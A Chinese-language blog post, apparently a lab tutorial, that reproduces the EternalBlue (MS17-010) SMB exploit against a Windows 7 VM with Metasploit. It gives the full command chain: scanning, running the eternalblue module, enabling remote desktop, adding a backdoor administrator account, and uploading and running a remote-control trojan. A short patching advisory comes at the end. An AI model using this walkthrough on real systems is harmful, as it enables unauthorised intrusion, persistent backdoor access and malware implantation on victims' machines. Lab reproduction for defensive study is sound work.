首页 > 其他分享 >永恒之蓝(MS17-010)的复现

永恒之蓝(MS17-010)的复现

时间:2023-01-15 11:45:00浏览次数:35  
标签:机器 010 漏洞 MS17 复现 msf SMB 输入

 漏洞介绍:

MS17-010又称永恒之蓝漏洞,利用Windows系统的SMB漏洞可以获取系统最高权限。最有名的安全事件就是不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。

攻击方式:恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

SMB协议:SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
 

漏洞复现:

1、准备工作:

首先我们 用带有漏洞的win7虚拟机作为目标机器,用kali作为攻击机。

用VM打开两台机器备用,关闭win7的防火墙和杀毒并测试两台机器是否互通(ping)。

我们要收集到目标机器的IP地址,在CMD中输入ipconfig

目标机器的IP为192.168.48.141

 我们用kali机器ping一下

可见,两台机器互通

2、kali机器:开启root用户

在kali里打开msf工具(输入 msfconsole)

 

出现

3、在msf中查找一下有关ms17-010的脚本

search ms17-010     #搜索msf中的ms17-010漏洞有关的脚本

 

 4、调用msf工具的辅助模块,检查是否可以进行ms7-010漏洞攻击

use auxiliary/scanner/smb/smb_ms17_010      #使用ms17-010的辅助模块

​编辑

5、查看辅助模块配置项

show options

 6、设置目标机的IP地址

set rhosts 192.168.48.141

7、运行辅助模块

run

 如图,没有报错,即为成功。(报错可能的原因有 (1)两台机器没有互通(2)win7系统不存在永恒之蓝漏洞)

8、调用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

​编辑

 9、查看配置项

show options

 10、设置攻击机的IP地址

set rhosts 192.168.48.141

​编辑

 11、运行攻击模块

run

​编辑

12、通过msf工具已经和win7系统目标机建立了连接

入侵目标一:远程操控目标机

入侵思路:既然不知道管理员用户的密码,我们可以创建一个新的管理员用户,打开远程操控的权限,实现对目标机器的远程操控

13、用msf开启目标机的远程操控功能

 run getgui -e

​编辑

14、使用shell命令

输入shell,进入shell模式

 

 15、创建新用户并提权

输入 net user ruqin(用户名) 123456(密码) /add

net localgroup groupname ruqin /add    #提权

16、测试远程控制

在我们的windows主机,打开远程操控

运行输入 mstsc

​编辑

输入 目标机器的IP地址

输入账户密码

 远程控制成功。

入侵目标二:注入远控工具

入侵思路:通过msf的文件传输命令,把自己需要的工具传输到win7目标机并运行

17、把文件准备好

这里我把一个远控工具生成的程序传送

​编辑

(输入exit退出shell模式到 meterpreter>)

输入 upload /home/yuyi/桌面/server.exe C:\\Windows   (注意文件名的大小写!)

 传输成功

18、在WIN7目标机打开远控

输入shell

cd ../     #进入到植入文件的文件目录

​编辑

19、运行文件

直接输入文件名,即可运行

​编辑

20、在自己的windows上打开控制工具,就可以远程控制了!

病毒防范:

微软已于2017 年 发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。

 


标签:机器,010,漏洞,MS17,复现,msf,SMB,输入
From: https://www.cnblogs.com/yuyi123/p/17053274.html

相关文章

  • 永恒之黑漏洞复现
    准备一台安装了python的电脑(可以是虚拟机)随便一个受到影响的windows电脑(可以是虚拟机,因为会蓝屏)受影响的windows电脑,包括:Windows10Version1903for32-bitSy......
  • ms17-010漏洞复现
    一、ms17-010漏洞复现(1)启用msf (2)搜索msf中和ms17-010漏洞相关的脚本   (3)使用ms17-010的辅助模块脚本(即搜到的3号模块)   (4)配置辅助模块脚本相关内容......
  • vue项目,npm run dev的时候出现:Error: error:0308010C:digital envelope routines::uns
    vue项目,npmrundev的时候出现:Error:error:0308010C:digitalenveloperoutines::unsupported这个是node的版本问题。我的node是17+的版本,按照网上说的降低版本又太麻烦......
  • 2022MoeCTF整理复现(NSS平台)
    一、[MoeCTF2022]小纸条1.jpg上的像是某种形式的猪圈密码,找一个对照表边猜边对照2.根据点和角的位置方向以及可能拼写成的单词,得到flagmoectf{ILOVEMYBIGBED}二、[M......
  • 【题解】P4292 [WC2010]重建计划
    【乐正绫AI】世末歌者「Cotton」绫绫,有你AI的每一天,我都很幸福[大笑][大笑][大笑]【乐正绫AI】世末歌者【砖厂浪人&TsingClouds】绫绫,有你的每一天,我都很幸福[大笑][大......
  • Nepnep x CATCTF赛后复现
    因为开赛时咩了,当时只签了几个到,只能赛后复现一下一、Cat_Jump1.刚开始使用VM挂载试了一下,打开后没什么反应,索性直接010打开搜索一下flag的头2.得到flagCatCTF{EFI_1s......
  • KingbaseES V8R3数据库运维案例之---不完整的启动包(incomplete startup packet)复现
    案例说明:在KingbaseESV8R3数据库的sys_log日志中,出现以下故障信息“不完整的启动包(incompletestartuppacket)”日志信息。本案例复现此日志信息发生的原因。如下图所示......
  • Bonitasoft认证绕过和RCE漏洞分析及复现(CVE-2022-25237)
    一、漏洞原理漏洞简述Bonitasoft是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita是一个用于业务流程自动化和优化的开源和可扩展......
  • word2010中统一调整表格格式
    word中统一调整表格格式基本思路是:1、选中所有的表格。2、再对表格格式调整。选中所有表格需要用到宏,操作很简单,具体操作如下:(1)工具栏“视......
  • word2010中统一调整表格格式
    word中统一调整表格格式基本思路是:1、选中所有的表格。2、再对表格格式调整。  选中所有表格需要用到宏,操作很简单,具体操作如下:(1)工具栏“视图”下右下角“宏”。  (2)点击......